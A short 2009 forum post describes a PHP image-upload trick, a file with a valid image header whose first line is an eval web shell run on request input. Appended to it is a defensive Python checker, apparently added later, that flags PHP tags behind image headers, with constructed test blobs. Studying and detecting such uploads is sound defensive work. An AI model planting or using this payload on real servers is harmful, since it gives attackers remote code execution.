Old 09-17-2009, 01:09 PM  
BestXXXPorn
Confirmed User
Join Date: Jun 2009
Location: Asheville, NC
Posts: 2,277
My favorite exploit is the fake image upload that has a correct image header...

If the image gets stored "as is", the first line of it is <?eval($_REQUEST['someVar']?>

If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating...
__________________
ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com
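A defensive counterpart to the upload trick described in the post above, added here as an example and not part of the original thread: a Python checker that applies the magic-byte test an upload handler typically relies on, and then shows why that test alone is insufficient by also scanning the bytes after the header for PHP open tags. The accepted image types, the tag pattern and the sample blobs are assumptions constructed for this example.

```python
import re

# Image types the (hypothetical) upload handler accepts, keyed by magic bytes.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# PHP open tags: "<?php", the echo short tag "<?=", or a short tag directly
# followed by a function call such as "<?eval(". Matching only these shapes
# keeps coincidental "<?" byte pairs inside compressed pixel data from firing.
PHP_TAG = re.compile(rb"<\?(?:php\b|=|[a-z_]\w*\s*\()", re.IGNORECASE)


def sniff_type(data: bytes):
    """Return the image type implied by the leading magic bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def classify_upload(data: bytes) -> dict:
    """Verdict for an uploaded blob.

    A correct header is necessary but not sufficient: the post's payload is
    exactly a valid header followed by interpreter-reachable code, so the
    blob is accepted only when it has a known header AND no PHP tag anywhere.
    """
    kind = sniff_type(data)
    match = PHP_TAG.search(data)
    return {
        "type": kind,
        "php_tag_offset": match.start() if match else None,
        "accept": kind is not None and match is None,
    }


# Constructed samples, not real uploads.
CLEAN_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"
POLYGLOT_GIF = b"GIF89a<?php echo 'x'; ?>" + b"\x00" * 16   # header passes, body does not
NOT_IMAGE = b"<?php echo 'x'; ?>"                           # no image header at all

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_GIF), ("polyglot", POLYGLOT_GIF), ("text", NOT_IMAGE)]:
        print(name, classify_upload(blob))
```

The tag scan is a heuristic; the robust mitigation is to decode and re-encode every upload with an image library so foreign bytes are discarded, and to serve the stored files from a location the interpreter never executes.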